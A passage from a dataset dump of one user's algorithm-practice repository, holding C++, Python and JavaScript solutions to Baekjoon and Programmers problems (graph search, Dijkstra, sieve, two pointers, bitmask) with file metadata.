b):\n a = getParent(a)\n b = getParent(b)\n \n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\ndef solution(n, costs):\n answer = 0\n \n for i in range(n + 1):\n parent.append(i)\n \n for i in range(len(costs)):\n costs[i][0], costs[i][1], costs[i][2] = costs[i][2], costs[i][0], costs[i][1]\n \n costs.sort()\n \n for i in costs:\n if not findParent(i[1], i[2]):\n unionParent(i[1], i[2])\n answer += i[0]\n \n return answer" }, { "alpha_fraction": 0.3847549855709076, "alphanum_fraction": 0.43557170033454895, "avg_line_length": 17.399999618530273, "blob_id": "9375f90af62fd6f5d4c36e270ea01f1ea5f0ba16", "content_id": "c106686b83ed0c50338beda22d20f98d25c6821a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 577, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Mathematics/1929.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1929번: 소수 구하기\nDATE: 2021-10-10\n*/\n#include <iostream>\n#include <math.h>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int arr[1000001];\n int m, n;\n cin >> m >> n;\n\n for(int i = 2 ; i <= n ; i++) {\n arr[i] = i;\n }\n\n for(int i = 2 ; i <= sqrt(n) ; i++) {\n if(arr[i] == 0) continue; //이미 소수가 아님\n\n for(int j = i * i ; j <= n ; j += i) arr[j] = 0;\n }\n\n for(int i = m ; i <= n ; i++) {\n if(arr[i] != 0) cout << arr[i] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.41812562942504883, "alphanum_fraction": 0.4479917585849762, "avg_line_length": 19.4526309967041, "blob_id": "fcdbaf66915e9f65739fc99018a8331f483728b5", "content_id": "1ea9cfcbbd534755a480eddbbcdb8a2f89e9d218", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2090, "license_type": "no_license", "max_line_length": 69, "num_lines": 95, "path": "/BOJ/Implementation/3190.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3190번: 뱀\nDATE: 2022-03-24\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 101\nusing namespace std;\n\nint n;\nint board[MAX][MAX]; // 0: 빈 칸, 1: 뱀, -1: 사과 \nvector<pair<int, char>> rotation;\nvector<pair<int,int>> snake;\nint dr[4] = {0, 1, 0, -1};\nint dc[4] = {1, 0, -1, 0};\n\nbool check_range(int r, int c){\n if(r < 1 || c < 1 || r > n || c > n) return false; // 벽에 부딪힌 경우\n if(board[r][c] == 1) return false; // 몸에 부딪히는 경우\n return true;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int k, l;\n int r, c, x;\n char ch;\n\n cin >> n >> k;\n\n int hr = 1, hc = 1;\n int dir = 0;\n\n board[1][1] = 1;\n snake.push_back({1, 1});\n\n while(k--){\n cin >> r >> c;\n board[r][c] = -1;\n }\n\n cin >> l;\n\n while(l--){\n cin >> x >> ch;\n rotation.push_back({x, ch});\n }\n\n sort(rotation.begin(), rotation.end());\n\n int sec = 1;\n\n while(1){\n bool apple = false;\n\n // 1. 머리 다음칸으로 이동\n int new_hr = hr + dr[dir];\n int new_hc = hc + dc[dir];\n\n if(!check_range(new_hr, new_hc)) break; // 종료\n if(board[new_hr][new_hc] == -1) apple = true; // 이동한 칸에 사과 존재\n\n board[new_hr][new_hc] = 1;\n snake.insert(snake.begin(), {new_hr, new_hc}); // 바뀐 머리 위치 삽입\n hr = new_hr;\n hc = new_hc;\n\n // 2. 이동한 칸에 사과 없는 경우 => 꼬리 위치한 칸 비워줌\n if(!apple) {\n board[snake.back().first][snake.back().second] = 0;\n snake.pop_back();\n }\n \n // 3. 방향 회전\n if(rotation.front().first == sec){\n if(rotation.front().second == 'D'){\n if(dir == 3) dir = 0;\n else dir += 1;\n }\n else{ \n if(dir == 0) dir = 3;\n else dir -= 1;\n }\n\n rotation.erase(rotation.begin());\n }\n\n sec++;\n }\n\n cout << sec;\n\n return 0;\n}" }, { "alpha_fraction": 0.35209712386131287, "alphanum_fraction": 0.40176600217819214, "avg_line_length": 18.717391967773438, "blob_id": "797889d469e95f4b946aeffaa7e0c789e966920c", "content_id": "9fce1b0140a2cf46edc577a6fdda9ee59adbfdb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 940, "license_type": "no_license", "max_line_length": 67, "num_lines": 46, "path": "/BOJ/Brute Force/15954.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 15954번: 인형들\nDATE: 2021-02-01\n*/\n#include <iostream>\n#include <cmath>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int arr[500];\n int n, k;\n cin >> n >> k;\n\n long double MIN = 10000000000000000;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n while(k <= n){\n for(int i = 0 ; i < n-k+1 ; i++){\n long double sum=0, m, variance, std;\n\n for(int j = i ; j < k+i ; j++){ //연속된 k개의 수 합\n sum += arr[j];\n }\n \n m = sum / k;\n \n sum = 0;\n for(int j = i ; j < k+i ; j++) sum += pow(arr[j]-m, 2);\n \n variance = sum / k; //분산\n std = sqrt(variance); //표준편차\n MIN = min(MIN, std);\n }\n\n k++;\n }\n \n cout.precision(11);\n cout << fixed << MIN;\n \n return 0;\n}" }, { "alpha_fraction": 0.3757396340370178, "alphanum_fraction": 0.40976330637931824, "avg_line_length": 20.140625, "blob_id": "ee3f3f03e1a4d7b58b7ac4db966ec632e5ac9ee9", "content_id": "1f92e8bad299d82e781e3c62387a039d75f1bbf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1378, "license_type": "no_license", "max_line_length": 75, "num_lines": 64, "path": "/BOJ/BFS_DFS/7562.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 7562번: 나이트의 이동\nDATE: 2021-01-25\nBFS\n*/\n#include <iostream>\n#include <queue>\n#include <string.h>\n#define MAX 300\n\nusing namespace std;\nint chess[MAX][MAX];\n//시계 반대 방향\nint dx[] = { -2, -1, 1, 2, 2, 1, -1, -2 };\nint dy[] = { -1, -2, -2, -1, 1, 2, 2, 1 };\nint l, str_x, str_y, dst_x, dst_y;\n\nvoid bfs() {\n queue<pair<int, int>> q;\n pair<int, int> p;\n\n q.push(make_pair(str_x, str_y));\n\n while (!q.empty()) {\n p = q.front();\n q.pop();\n\n if (p.first == dst_x && p.second == dst_y) {\n cout << chess[dst_x][dst_y] - 1 << \"\\n\";\n break;\n }\n\n for (int i = 0; i < 8; i++) {\n int nx = p.first + dx[i];\n int ny = p.second + dy[i];\n \n if(nx < 0 || ny < 0 || nx >= l || ny >= l)\n continue;\n if (nx >= 0 && ny >= 0 && nx < l && ny < l && !chess[nx][ny]) {\n q.push(make_pair(nx, ny));\n chess[nx][ny] = chess[p.first][p.second] + 1;\n }\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int t;\n cin >> t;\n\n for (int i = 0; i < t; i++) {\n cin >> l;\n cin >> str_x >> str_y;\n cin >> dst_x >> dst_y;\n\n memset(chess, 0, sizeof(chess));\n chess[str_x][str_y] = 1;\n \n bfs();\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.43562230467796326, "alphanum_fraction": 0.504291832447052, "avg_line_length": 12.735294342041016, "blob_id": "6c38a0e0e9e80d2b091a92bc9e1c9ff5167a10c3", "content_id": "45d2894983816ee211858b39a728327c1d9de837", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 480, "license_type": "no_license", "max_line_length": 58, "num_lines": 34, "path": "/BOJ/Implementation/1110.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1110번: 더하기 사이클\n2021-03-23\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\tint n, units, tens, num, cycle=0;\n\tcin >> n;\n\n\tnum = n;\n \n\twhile (1) {\n\t\tcycle++;\n\n\t\tif (num < 10) {\n\t\t\tnum = 10 * num + num;\n\t\t}\n\t\telse if (num >=10) {\n\t\t\tunits = num % 10;\n\t\t\ttens = num / 10;\n\t\t\tnum = 10 * units + (units+tens)%10;\n\t\t}\n\n\t\tif (num == n) {\n\t\t\tcout << cycle << \"\\n\";\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.30705395340919495, "alphanum_fraction": 0.3286307156085968, "avg_line_length": 18.770492553710938, "blob_id": "3fee39d55d6ed0404ce6ac134a10013919078218", "content_id": "1dd94a4765fdfb9239891d02c6c9f2757eb7eb09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1237, "license_type": "no_license", "max_line_length": 87, "num_lines": 61, "path": "/BOJ/Binary Search/2512.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 2512번: 예산\n//2021-05-25\n//Binary Search\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, sum=0, ans=-1;\n cin >> n;\n\n int arr[n];\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n sum += arr[i];\n }\n\n sort(arr, arr+n);\n\n cin >> m;\n\n if(sum <= m){\n cout << arr[n - 1];\n }\n else{\n int start = 0;\n int end = m;\n int mid;\n\n while(start <= end){\n //mid => Ư���� ���� ���Ѿ�\n sum = 0;\n mid = (start + end) / 2;\n\n for(int i = 0 ; i < n ; i++){\n if(arr[i] <= mid)\n sum += arr[i];\n else\n sum += mid;\n }\n \n cout << \"start: \" << start << \" end: \" << end << \" [mid: \" << mid << \"]\\n\";\n cout << \"sum: \" << sum << \"\\n\\n\";\n\n if(sum <= m){\n start = mid + 1;\n if(mid > ans) \n ans = mid;\n }\n else if(sum > m){\n end = mid - 1;\n }\n }\n\n cout << ans;\n\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3388090431690216, "alphanum_fraction": 0.37029433250427246, "avg_line_length": 19.30555534362793, "blob_id": "fc571c6be8f700862f5e882fe8c8debdef40080e", "content_id": "7137d758717dcdc6ded3f88fa1288f03260abe8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1471, "license_type": "no_license", "max_line_length": 70, "num_lines": 72, "path": "/BOJ/BFS_DFS/2468.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 2468번: 안전 영역\nDATE: 2021-02-06\nDFS\n*/\n#include <iostream>\n#include <cstring>\n#include <vector>\n#include <algorithm>\n#define MAX 101\nusing namespace std;\n\nint area[MAX][MAX];\nint tmp[MAX][MAX];\nint dx[] = {-1, 0, 1, 0};\nint dy[] = {0, 1, 0, -1};\nint n;\n\nvoid dfs(int x, int y){\n tmp[x][y] = 0;\n \n for(int i = 0 ; i < 4 ; i++){\n int nx = x + dx[i];\n int ny = y + dy[i];\n if(nx >= 0 && ny >= 0 && nx < n && ny < n && tmp[nx][ny] == 1)\n dfs(nx, ny);\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int ans = -1, max_value = 0;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n cin >> area[i][j];\n max_value = max(area[i][j], max_value);\n }\n }\n\n memcpy(tmp, area, sizeof(area));\n\n for(int k = 0 ; k < max_value ; k++){\n int cnt = 0;\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n if(area[i][j] <= k){\n tmp[i][j] = 0;\n }\n else tmp[i][j] = 1;\n }\n }\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n if(tmp[i][j] == 1){\n cnt++;\n dfs(i, j);\n }\n }\n }\n \n memcpy(tmp, area, sizeof(area));\n ans = max(ans, cnt);\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.34015747904777527, "alphanum_fraction": 0.38792651891708374, "avg_line_length": 23.126583099365234, "blob_id": "d2dc8427a6e696c9da9431b21688d650a4434268", "content_id": "05c47a27de9178c34a85686c08b7b7afbda1e317", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2017, "license_type": "no_license", "max_line_length": 80, "num_lines": 79, "path": "/BOJ/Implementation/14500.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14500번: 테트로미노\nDATE: 2021-10-13\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint ans = -1;\nint n, m;\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\nint arr[500][500] = {0, }, visited[500][500] = {0, };\n\nvoid solve_shape(int x, int y) { // ㅜ 모양은 dfs가 불가능\n if(x >= 0 && x + 1 < n && y >= 0 && y + 2 < m) {\n // ㅜ\n ans = max(ans, arr[x][y] + arr[x][y+1] + arr[x][y+2] + arr[x+1][y+1]);\n }\n if(x - 1 >= 0 && x + 1 < n && y >= 0 && y + 1 < m) {\n // ㅓ\n ans = max(ans, arr[x][y] + arr[x][y+1] + arr[x+1][y+1] + arr[x-1][y+1]);\n }\n if(x - 1 >= 0 && x < n && y >= 0 && y + 2 < m) {\n // ㅗ\n ans = max(ans, arr[x][y] + arr[x][y+1] + arr[x][y+2] + arr[x-1][y+1]);\n }\n if(x >= 0 && x + 2 < n && y >= 0 && y + 1 < m) {\n // ㅏ\n ans = max(ans, arr[x][y] + arr[x+1][y] + arr[x+2][y] + arr[x+1][y+1]);\n }\n}\n\nvoid solve(int x, int y, int length, int sum) {\n if(length == 4) {\n ans = max(ans, sum);\n return;\n }\n\n for(int i = 0; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= m || visited[nx][ny]) continue;\n visited[nx][ny] = 1;\n solve(nx, ny, length + 1, sum + arr[nx][ny]);\n visited[nx][ny] = 0; //대칭, 회전 위해서는 다시 방문해야함\n }\n\n return;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n cin >> arr[i][j];\n }\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n // ㅜ 모양\n solve_shape(i, j);\n\n // 나머지 모양\n visited[i][j] = 1;\n solve(i, j, 1, arr[i][j]);\n visited[i][j] = 0; // 대칭, 회전 위해서는 다시 방문해야함\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.30854272842407227, "alphanum_fraction": 0.364824116230011, "avg_line_length": 22.162790298461914, "blob_id": "f059ebe2e309e8576bf43360310ac46ca2dea3ee", "content_id": "9155026197822dc7b062bca8260bca20e596d98e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1011, "license_type": "no_license", "max_line_length": 115, "num_lines": 43, "path": "/BOJ/Dynamic Programming/9184.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9184번: 신나는 함수 실행\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\nusing namespace std;\nint dp[21][21][21];\n\nint w(int a, int b, int c){\n if(a <= 0 || b <= 0 || c <= 0)\n return 1;\n else if(a > 20 || b > 20 || c > 20)\n return w(20, 20, 20);\n else if(a < b && b < c){\n if(dp[a][b][c] != 0)\n return dp[a][b][c];\n else\n return dp[a][b][c] = w(a, b, c - 1) + w(a, b - 1, c - 1) - w(a, b - 1, c);\n }\n else{\n if(dp[a][b][c] != 0)\n return dp[a][b][c];\n else\n return dp[a][b][c] = w(a - 1, b, c) + w(a - 1, b - 1, c) + w(a - 1, b, c - 1) - w(a - 1, b - 1, c - 1);\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n while(1){\n int a, b, c;\n cin >> a >> b >> c;\n\n if(a == -1 && b == -1 && c == -1)\n break;\n \n cout << \"w(\" << a << \", \" << b << \", \" << c << \") = \" << w(a, b, c) << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.44920843839645386, "alphanum_fraction": 0.4696570038795471, "avg_line_length": 22.703125, "blob_id": "9bc69b4a26ea07fbdbd00049725ed0afc4555a86", "content_id": "ef5f4d6ebd5cf93a999b60ef9a8622b63bdced69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1714, "license_type": "no_license", "max_line_length": 80, "num_lines": 64, "path": "/BOJ/Sliding Window/3078.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3078번: 좋은 친구\nDATE: 2022-01-19\nSliding Window\n*/\n#include <iostream>\n#include <vector>\n#include <map>\n#define startNameLen vec[s].second\n#define endNameLen vec[e].second\nusing namespace std;\n\nvector<pair<int,int>> vec;\nmap<int, int> m; \nint n, k;\nint s = 0, e = 0;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n long long ans = 0;\n\n cin >> n >> k;\n\n for(int i = 0 ; i < n ; i++){\n cin >> str;\n vec.push_back({i + 1, str.length()}); // (등수, 이름의 길이)\n }\n \n while(1){\n if(e == n) { // end는 끝에 다다르고 start만 증가해야 하는 경우\n while(s < n){\n // 범위를 벗어난 값 제거 (창문에서 나가는 값)\n if(m[startNameLen] > 1) m[startNameLen]--;\n else if(m[startNameLen] == 1) m.erase(m[startNameLen]);\n s++;\n\n if(m[startNameLen] > 1) ans += m[startNameLen] - 1; // 쌍의 개수 구하기\n }\n break;\n }\n\n if(e - s > k) { // 범위를 벗어난 값 제거 (창문에서 나가는 값)\n if(m[startNameLen] > 1) m[startNameLen]--;\n else if(m[startNameLen] == 1) m.erase(startNameLen);\n s++;\n }\n\n while(e - s <= k){ // end 값을 증가시키며 새로운 값 처리 (창문에 새로 들어오는 값)\n if(m.find(endNameLen) == m.end()) m.insert({endNameLen, 1});\n else m[endNameLen]++;\n\n if(e - s == k){ // 쌍의 개수 구하기\n if(m[startNameLen] > 1) ans += m[startNameLen] - 1;\n }\n\n e++;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.34866827726364136, "alphanum_fraction": 0.4043583571910858, "avg_line_length": 21.351350784301758, "blob_id": "ba017719c4f48312e8e8e7d4204a729202fd18c9", "content_id": "a275e390d1e3b70e83f35725dd1a065d87dfb5d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 834, "license_type": "no_license", "max_line_length": 58, "num_lines": 37, "path": "/BOJ/Implementation/9610.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 9610번: 사분면\n//2021-05-04\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, q1=0, q2=0, q3=0, q4=0, axis=0;\n pair<int, int> pos;\n\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n int x, y;\n cin >> x >> y;\n pos = make_pair(x, y);\n\n if(pos.first > 0 && pos.second > 0)\n q1++;\n else if(pos.first < 0 && pos.second > 0)\n q2++;\n else if(pos.first < 0 && pos.second < 0)\n q3++;\n else if(pos.first > 0 && pos.second < 0)\n q4++;\n else\n axis++;\n }\n\n cout << \"Q1: \" << q1 << \"\\n\";\n cout << \"Q2: \" << q2 << \"\\n\";\n cout << \"Q3: \" << q3 << \"\\n\";\n cout << \"Q4: \" << q4 << \"\\n\";\n cout << \"AXIS: \" << axis << \"\\n\";\n\n return 0;\n}" }, { "alpha_fraction": 0.5265700221061707, "alphanum_fraction": 0.6135265827178955, "avg_line_length": 13.857142448425293, "blob_id": "2224a934b39408c043a32c6525de93a0fc77c774", "content_id": "67e240b6c1ad27c45b983223129b6f3bdebaa006", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 25, "num_lines": 14, "path": "/BOJ/Implementation/11656.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# 11656.py\n# BOJ 11656: 접미사 배열\n# DATE: 2022-03-15\nimport sys\nread = sys.stdin.readline\n\ns = read().strip()\ns_list = []\n\nfor i in range(len(s)):\n s_list.append(s[i:])\n\nfor i in sorted(s_list):\n print(i)" }, { "alpha_fraction": 0.42092689871788025, "alphanum_fraction": 0.4495938718318939, "avg_line_length": 22.266666412353516, "blob_id": "c8ed33638a5cd96f89b9a85a963a00b417d20293", "content_id": "f103f368881ce6a98a3cb1778f8e31829cc22840", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2137, "license_type": "no_license", "max_line_length": 88, "num_lines": 90, "path": "/BOJ/BFS_DFS/14502.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14502번: 연구소\nDATE: 2021-10-07\nUPDATE: 2022-04-03\nBFS\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <queue>\n#include <string.h>\n#define MAX 8\nusing namespace std;\n\nvector<pair<int, int>> virus, candidate;\nint n, m, ans = -1;\nint arr[MAX][MAX], tmp[MAX][MAX], visited[MAX][MAX];\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\n\nvoid bfs(int x, int y) {\n queue<pair<int, int>> q;\n\n q.push(make_pair(x, y));\n visited[x][y] = 1;\n\n while(!q.empty()) {\n int x = q.front().first;\n int y = q.front().second;\n q.pop();\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= m || visited[nx][ny] == 1) continue;\n if(tmp[nx][ny] == 1) continue;\n\n visited[nx][ny] = 1;\n q.push(make_pair(nx, ny));\n tmp[nx][ny] = 2;\n }\n \n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n cin >> arr[i][j];\n if(arr[i][j] == 2) virus.push_back(make_pair(i, j));\n else if(arr[i][j] == 0) candidate.push_back(make_pair(i, j));\n }\n }\n\n vector<bool> idx(candidate.size(), false);\n\n for(int i = 0 ; i < 3 ; i++) idx[i] = true;\n sort(idx.begin(), idx.end());\n\n do{\n int cnt = 0;\n\n memcpy(tmp, arr, sizeof(arr));\n memset(visited, 0, sizeof(visited));\n\n for(int i = 0 ; i < idx.size() ; i++){\n if(idx[i]) tmp[candidate[i].first][candidate[i].second] = 1; //벽 설치\n }\n\n for(int i = 0 ; i < virus.size() ; i++) {\n bfs(virus[i].first, virus[i].second); //바이러스 위치에서 bfs 시작\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n if(tmp[i][j] == 0) cnt++; //안전 영역 수\n }\n }\n\n ans = max(cnt, ans); \n }while(next_permutation(idx.begin(), idx.end()));\n \n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4429223835468292, "alphanum_fraction": 0.47031962871551514, "avg_line_length": 17.29166603088379, "blob_id": "f79083ca218acc314dbf6f7801a1f4d4245cd806", "content_id": "13566d243b1e251fe73652c168d3817df1cf09e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 438, "license_type": "no_license", "max_line_length": 53, "num_lines": 24, "path": "/programmers/Level 2/h-index.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: H-index\n2021-12-26\n*/\nfunction solution(citations) {\n let answer = 0;\n let num = citations.length;\n\n citations.sort((a, b) => {\n return a - b\n });\n\n for (let i = num; i >= 0; i--) {\n let index = citations.findIndex(v => v >= i);\n index = index === -1 ? num : index;\n\n if (num - index >= i) {\n answer = i\n break;\n }\n }\n\n return answer;\n}" }, { "alpha_fraction": 0.4190231263637543, "alphanum_fraction": 0.4627249240875244, "avg_line_length": 18.475000381469727, "blob_id": "d4c930877ff3390c4edda6234f6c953cd50828cc", "content_id": "764398c5462b022f27da6ff1b73804407ba6a524", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 786, "license_type": "no_license", "max_line_length": 64, "num_lines": 40, "path": "/BOJ/Two Pointer/2470.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2470번: 두 용액\n2021-12-28\nTwo pointer\n*/\n#include <iostream>\n#include <algorithm>\n#include <vector>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n vector<int> ans(2);\n int start = 0, end = n - 1, min = 2000000001;\n int arr[n];\n\n for(int i = 0 ; i < n ; i++) cin >> arr[i];\n sort(arr, arr + n);\n \n while(start < end) {\n int sum = arr[start] + arr[end];\n\n if(abs(sum) < min) {\n ans[0] = arr[start];\n ans[1] = arr[end];\n min = abs(sum);\n }\n \n if(sum < 0) start++;\n else end--;\n }\n\n sort(ans.begin(), ans.end());\n for(int i = 0 ; i < ans.size() ; i++) cout << ans[i] << \" \";\n\n return 0;\n}" }, { "alpha_fraction": 0.4434320330619812, "alphanum_fraction": 0.46545177698135376, "avg_line_length": 19.59375, "blob_id": "9fed0277bea674980b7b58435d002cf276cef8df", "content_id": "21c862dafb99a2da4d03304213f82311de514fd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1327, "license_type": "no_license", "max_line_length": 88, "num_lines": 64, "path": "/BOJ/Dijkstra/1753.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1753번: 최단경로\nDATE: 2021-02-18\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 20001\n#define INF 1e9\nusing namespace std;\n\nvector<pair<int, int>> graph[MAX];\nint d[MAX];\n\nvoid dijkstra(int start){\n priority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> pq; \n \n pq.push(make_pair(0, start));\n d[start] = 0;\n\n while(!pq.empty()){\n int cost = pq.top().first;\n int now = pq.top().second;\n pq.pop();\n\n for(int i = 0 ; i < graph[now].size() ; i++){ \n int next = graph[now][i].first;\n int nCost = graph[now][i].second;\n if(cost + nCost < d[next]){\n d[next] = cost + nCost;\n pq.push(make_pair(d[next], next));\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int v, e, start;\n\n cin >> v >> e >> start;\n\n for(int i = 0 ; i < e ; i++){\n int x, y, z;\n cin >> x >> y >> z;\n graph[x].push_back(make_pair(y, z)); \n }\n\n for(int i = 1 ; i <= v ; i++){\n d[i] = INF;\n }\n\n dijkstra(start);\n\n for(int i = 1 ; i <= v ; i++){\n if(d[i] == INF)\n cout << \"INF\" << \"\\n\";\n else \n cout << d[i] << \"\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4838709533214569, "alphanum_fraction": 0.5107526779174805, "avg_line_length": 15.441176414489746, "blob_id": "573ef80e2f0324ccbcce6f728a4b3eb6c6b3f7ab", "content_id": "fda8255867e5e0a234af9e38818f8ebd66923efc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 566, "license_type": "no_license", "max_line_length": 52, "num_lines": 34, "path": "/programmers/Level 3/network.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 3: 네트워크\n2022-02-24\nDFS\n*/\n#include <string>\n#include <vector>\n#define MAX 200\nusing namespace std;\n\nvector<vector<int>> cp;\nbool visited[MAX];\n\nvoid dfs(int num, int n){\n visited[num] = true;\n \n for(int i = 0 ; i < n ; i++) {\n if(cp[num][i] && !visited[i]) dfs(i, n);\n }\n}\n\nint solution(int n, vector<vector<int>> computers) {\n int answer = 0;\n cp = computers;\n \n for(int i = 0 ; i < n ; i++){\n if(!visited[i]) {\n answer++;\n dfs(i, n);\n }\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.3135313391685486, "alphanum_fraction": 0.34873488545417786, "avg_line_length": 18.36170196533203, "blob_id": "104dd654a66dd40f3e5144b28189b9b80c5d2ec3", "content_id": "8f0f306ec8687f0d6a838750978667193cdc2411", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 915, "license_type": "no_license", "max_line_length": 58, "num_lines": 47, "path": "/BOJ/Bitmask/11723.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11723번: 집합\nDATE: 2022-01-25\nBitmask\n*/\n#include <iostream>\nusing namespace std;\n\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int m, num;\n string cmd;\n\n int s = 0;\n\n cin >> m;\n\n for(int i = 0 ; i < m ; i++){\n cin >> cmd;\n\n if(cmd == \"add\") {\n cin >> num;\n s |= (1 << num);\n }\n else if(cmd == \"remove\") {\n cin >> num;\n s &= ~(1 << num);\n }\n else if(cmd == \"check\") {\n cin >> num;\n if(s & (1 << num)) cout << 1 << '\\n';\n else cout << 0 << '\\n';\n 